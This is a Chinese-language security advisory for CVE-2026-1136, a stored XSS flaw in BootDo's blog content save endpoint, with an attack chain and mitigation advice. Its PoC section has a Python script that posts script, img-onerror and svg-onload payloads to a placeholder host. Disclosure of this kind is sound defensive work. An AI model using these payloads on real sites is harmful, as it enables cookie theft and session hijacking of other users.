CVE-2026-1136 CVSS 3.5 低危

CVE-2026-1136: BootDo ContentController跨站脚本漏洞

披露日期: 2026-01-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1136

漏洞类型

跨站脚本(XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

lcg0124 BootDo

漏洞概述

CVE-2026-1136是存在于BootDo项目中的一个存储型跨站脚本(XSS)漏洞。该漏洞源于ContentController组件的Save函数对用户输入内容缺乏充分的输入验证和输出编码。攻击者可以通过构造恶意Payload注入到content、author或title参数中，当其他用户访问包含恶意脚本的内容时，脚本将在受害者浏览器中执行，从而窃取Cookie、会话令牌或其他敏感信息。漏洞影响版本至提交e93dd428ef6f5c881aa74d49a2099ab0cf1e0fcb。由于该产品采用滚动发布模式，官方未提供具体的受影响版本号和修复版本信息。漏洞已被公开披露并可能出现实际攻击利用。

技术细节

漏洞位于BootDo项目的ContentController.java文件中的Save函数，处理路径为/blog/bContent/save。该函数在处理用户提交的content、author、title三个参数时，未对特殊HTML字符进行转义或过滤，直接存储到数据库。当这些数据被其他用户请求时，恶意脚本会作为响应内容的一部分返回给客户端浏览器并执行。攻击者可以利用此漏洞构造钓鱼攻击、窃取用户凭证、进行会话劫持或传播恶意软件。由于是存储型XSS，恶意脚本会持久存在于系统中，影响所有访问该内容的用户。CVSS 3.1评分3.5分，攻击复杂度低但需要低权限用户身份和用户交互才能触发。

攻击链分析

STEP 1

步骤1

攻击者获取目标BootDo系统低权限账户

STEP 2

步骤2

向/blog/bContent/save端点发送包含XSS Payload的恶意请求

STEP 3

步骤3

Payload（content/author/title参数中的恶意脚本）被存储到数据库

STEP 4

步骤4

其他用户访问包含恶意内容的页面

STEP 5

步骤5

恶意脚本在受害者浏览器中执行，窃取Cookie或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-1136 XSS PoC for BootDo ContentController
# Target: BootDo application with vulnerable /blog/bContent/save endpoint

target_url = "http://target-server.com/blog/bContent/save"

# Malicious XSS payload in content parameter
payload = {
    "content": "<script>alert(document.cookie)</script>",
    "author": "<img src=x onerror=alert('XSS')>",
    "title": "<svg onload=alert('XSS')>"
}

# Authentication required (PR:L - Low Privileges)
cookies = {
    "JSESSIONID": "your-session-id"
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] XSS payload sent successfully")
        print("[+] Payload will execute when content is viewed")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

影响范围

BootDo 所有版本至提交 e93dd428ef6f5c881aa74d49a2099ab0cf1e0fcb

防御指南

临时缓解措施

在用户输入进入数据库前进行严格的输入验证和HTML编码处理，使用OWASP ESAPI或类似库对特殊字符进行转义。部署Content-Security-Policy响应头限制脚本来源。对ContentController的Save函数增加XSS过滤器。建议在生产环境中使用WAF进行临时防护，同时准备升级到官方修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1136
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1136
3 Details https://www.cvedetails.com/cve/CVE-2026-1136/
4 VulDB https://vuldb.com/cve/CVE-2026-1136
5 Link https://github.com/webzzaa/CVE-/issues/4
6 Link https://vuldb.com/?ctiid.341726
7 Link https://vuldb.com/?id.341726
8 Link https://vuldb.com/?submit.735164

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表